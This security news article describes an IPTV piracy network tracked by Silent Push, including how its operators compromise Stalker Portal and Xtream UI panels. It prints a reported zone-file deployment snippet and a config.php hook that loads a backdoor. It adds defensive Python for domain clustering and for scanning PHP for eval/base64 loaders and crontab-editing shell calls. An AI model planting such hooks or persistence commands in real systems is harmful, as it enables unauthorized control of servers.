A sprawling network of illicit Internet Protocol Television (IPTV) services has been discovered, operating across more than 1,100 domains and in excess of 10,000 IP addresses.
The infrastructure, which has remained active for several years, delivers unauthorized streams of premium content, including major sports leagues, subscription services, and on-demand platforms, without any licensing agreements.
Silent Push analysts noted that this network’s use of both high-volume IP address pools and rapidly rotating domains represents a significant escalation in piracy tactics, making traditional takedown processes nearly futile.
At its core, the network relies on customized IPTV panels built around modified open-source software such as Stalker Portal and Xtream UI.
These panels facilitate automated user authentication and stream distribution, allowing operators to provision hundreds of thousands of simultaneous sessions.
Rather than depending on a single front-end domain, the operators employ a large pool of proxy domains—each resolving to multiple shared IP addresses—to obfuscate the true origin of the streams.
Silent Push researchers identified two companies, XuiOne and Tiyansoft, and an individual, Nabi Neamati of Herat, Afghanistan, as principal beneficiaries of this infrastructure.
The attack vectors begin with server-side exploitation and credential harvesting. Malicious actors compromise under-protected web hosts or exploit outdated control panels to install custom modules that inject backdoors into legitimate streaming control software.
In many cases, operators gain initial access by exploiting default credentials on cPanel, Plesk, and Stalker Portal installations.
Once access is secured, a deployment script—often obfuscated via Base64 encoding—pushes modified PHP files and cron jobs to automate the registration of new domains and the rotation of stream endpoints.
Silent Push analysts identified one such script that uses the following snippet to point a compromised host's domain at the shared IP pool by appending A records to a BIND zone file and reloading the name server:
<?php
// Reported deployment snippet: read the compromised WordPress site's URL via WP-CLI,
// append one A record per address in the pool to a BIND zone file, then reload BIND.
$siteUrl = trim(shell_exec('wp option get siteurl'));
// A zone record needs the bare host name, not the full URL that `siteurl` returns.
$domain = parse_url($siteUrl, PHP_URL_HOST) ?: $siteUrl;
$ipList = ['158.220.114.199', '46.202.197.208'];
foreach ($ipList as $ip) {
    shell_exec("echo '$domain IN A $ip' >> /etc/bind/db.piracy");
}
shell_exec('rndc reload');
Despite repeated takedown requests, the network’s agility in rotating both domains and IP addresses allows it to remain operational.
New domains appear almost daily, with each resolving to clusters of dynamic IP addresses provisioned via bullet-proof hosting providers.
This resilient structure poses a formidable challenge to rights holders and law enforcement agencies attempting to disrupt the service.
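The shared IP pools described above are also what makes this kind of infrastructure trackable: domains that resolve to common addresses can be grouped, and the addresses they share treated as pivot points for blocking or monitoring. The Python below is an added example written for this article, not Silent Push's tooling; the resolution records are constructed placeholders on documentation address ranges, and the clustering is plain union-find over domain/IP pairs.

```python
"""Cluster domains that resolve to shared IPs (added example, not the researchers' code).

Each observation is a (domain, ip) pair of the kind a passive-DNS feed yields.
Domains are linked when they share an IP; connected components approximate one
operator's proxy-domain pool, and IPs seen behind several domains are the pivots.
"""
from collections import defaultdict

# Constructed sample observations: placeholder domains on RFC 5737 documentation ranges.
OBSERVATIONS = [
    ("stream-a.example", "203.0.113.10"),
    ("stream-a.example", "203.0.113.11"),
    ("stream-b.example", "203.0.113.11"),
    ("stream-b.example", "203.0.113.12"),
    ("portal-c.example", "203.0.113.12"),
    ("unrelated.example", "198.51.100.5"),
    ("cdn-d.example", "198.51.100.7"),
    ("cdn-d.example", "198.51.100.5"),
]


def _find(parent, x):
    """Union-find root lookup with path halving."""
    while parent[x] != x:
        parent[x] = parent[parent[x]]
        x = parent[x]
    return x


def _union(parent, a, b):
    ra, rb = _find(parent, a), _find(parent, b)
    if ra != rb:
        parent[rb] = ra


def shared_ips(observations, min_domains=2):
    """IPs that at least `min_domains` distinct domains resolve to: the pivot points."""
    by_ip = defaultdict(set)
    for domain, ip in observations:
        by_ip[ip].add(domain)
    return {ip: sorted(doms) for ip, doms in by_ip.items() if len(doms) >= min_domains}


def cluster_by_shared_ips(observations):
    """Group domains into connected components linked through common IPs.

    Returns a list of {"domains": [...], "ips": [...]} dicts, largest cluster first.
    """
    by_ip = defaultdict(set)
    domain_ips = defaultdict(set)
    for domain, ip in observations:
        by_ip[ip].add(domain)
        domain_ips[domain].add(ip)

    parent = {d: d for d in domain_ips}
    for doms in by_ip.values():
        doms = sorted(doms)
        for other in doms[1:]:          # every domain on this IP joins the first one's set
            _union(parent, doms[0], other)

    groups = defaultdict(set)
    for d in domain_ips:
        groups[_find(parent, d)].add(d)

    clusters = []
    for doms in groups.values():
        ips = set().union(*(domain_ips[d] for d in doms))
        clusters.append({"domains": sorted(doms), "ips": sorted(ips)})
    clusters.sort(key=lambda c: (-len(c["domains"]), c["domains"]))
    return clusters


if __name__ == "__main__":
    for c in cluster_by_shared_ips(OBSERVATIONS):
        print(f"{len(c['domains'])} domains over {len(c['ips'])} IPs: {', '.join(c['domains'])}")
    for ip, doms in sorted(shared_ips(OBSERVATIONS).items()):
        print(f"pivot {ip} -> {', '.join(doms)}")
```

On the sample data this yields one three-domain cluster spanning three addresses and a second, unrelated pair; in practice the clusters are only as good as the resolution feed, and bullet-proof hosters that hand the same address to unrelated tenants will produce false joins, so an analyst should confirm a cluster with a second signal (shared TLS certificate, panel fingerprint, registrant) before acting on it.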
Infection Mechanism Through Control Panel Exploits
A particularly insidious aspect of this IPTV piracy network is its infection mechanism, which centers on compromised control panels.
Operators scan the internet for misconfigured or outdated Stalker Portal and Xtream UI installations, using automated scanners to find exposed panels on ports 80, 8080, and 2095.
Upon identifying a target, they deploy a multi-stage payload that begins with a low-profile reconnaissance module.
This module enumerates existing user accounts, collects hashed credentials, and exfiltrates configuration files containing API keys.
A second stage installs a persistent backdoor by modifying the config.php file within the panel's directory:
<?php
// Hook appended to the panel's config.php: the guard constant keeps the include
// from running twice, and the require pulls in the attacker's file on every load.
if (!defined('IPTV_INIT')) {
    define('IPTV_INIT', true);
    require_once __DIR__ . '/backdoor.php';
}
The backdoor script, backdoor.php, establishes a reverse shell to a command-and-control server whenever an administrator logs in, effectively granting the attackers full control over the panel.
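A defender handed a suspect panel can look for the two artefacts this article describes, the Base64-obfuscated deployment script with its cron job and the include hook planted in config.php, with a simple scan of the PHP sources. The Python below is an added example, not code from the article or from the panel projects; the PHP samples are constructed, the allowlist of expected includes (db.php, functions.php) is hypothetical and would be built from a clean copy of the same panel version, and the IPTV_INIT sentinel is taken from the snippet above.

```python
"""Triage PHP panel sources for the indicators described in the article (added example).

Rules: the IPTV_INIT sentinel define, eval(base64_decode(...)) loaders, shell calls that
edit crontab, and require/include of any file not on a known-good allowlist.
"""
import re

# Hypothetical allowlist: what a clean config.php of this panel is expected to include.
EXPECTED_INCLUDES = {"db.php", "functions.php"}

RULES = [
    ("sentinel-define", re.compile(r"define\s*\(\s*['\"]IPTV_INIT['\"]")),
    ("eval-base64", re.compile(r"eval\s*\(\s*(?:gzinflate\s*\(\s*)?base64_decode\s*\(")),
    ("shell-crontab", re.compile(r"(?:shell_exec|exec|system|passthru)\s*\(\s*['\"][^'\"]*crontab")),
]
INCLUDE_RE = re.compile(r"\b(?:require|include)(?:_once)?\s*\(?\s*(?P<target>[^;]+?)\s*\)?\s*;")

# Constructed samples: a clean config.php, one carrying the hook, and a loader script.
CLEAN_CONFIG = """<?php
$db_host = 'localhost';
require_once __DIR__ . '/db.php';
require_once(__DIR__ . '/functions.php');
"""

TAMPERED_CONFIG = """<?php
$db_host = 'localhost';
require_once __DIR__ . '/db.php';
if (!defined('IPTV_INIT')) {
    define('IPTV_INIT', true);
    require_once __DIR__ . '/backdoor.php';
}
require_once(__DIR__ . '/functions.php');
"""

# The Base64 payload here decodes to a harmless echo; real loaders carry the deployer.
DEPLOY_SCRIPT = """<?php
eval(base64_decode('ZWNobyAiaGkiOw=='));
shell_exec("(crontab -l; echo '*/5 * * * * php /var/www/html/rotate.php') | crontab -");
"""


def _include_basename(target):
    """Basename of the last quoted path segment in an include target, else the raw target."""
    quoted = re.findall(r"['\"]([^'\"]+)['\"]", target)
    return quoted[-1].rsplit("/", 1)[-1] if quoted else target.strip()


def scan_php_source(text):
    """Return (rule, line_number, line) findings for one PHP file's contents."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((name, lineno, line.strip()))
        m = INCLUDE_RE.search(line)
        if m and _include_basename(m.group("target")) not in EXPECTED_INCLUDES:
            findings.append(("unexpected-include", lineno, line.strip()))
    return findings


def triage(files):
    """Scan a {name: source} mapping and keep only files with findings."""
    report = {name: scan_php_source(src) for name, src in files.items()}
    return {name: hits for name, hits in report.items() if hits}


if __name__ == "__main__":
    samples = {"clean/config.php": CLEAN_CONFIG,
               "tampered/config.php": TAMPERED_CONFIG,
               "tampered/deploy.php": DEPLOY_SCRIPT}
    for name, hits in triage(samples).items():
        for rule, lineno, line in hits:
            print(f"{name}:{lineno}: {rule}: {line}")
```

The allowlist approach flags the planted require_once without knowing the backdoor's file name in advance, which matters because the name is trivially changed; the sentinel and eval rules catch the specific shapes reported here and should be treated as a starting point, not a complete signature set.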
This persistent foothold enables continuous updates to the hosting infrastructure, seamless domain registration, and dynamic IP assignment—ensuring that new entry points replace any that have been taken down.
As a result, the network can sustain large-scale piracy operations with minimal interruption.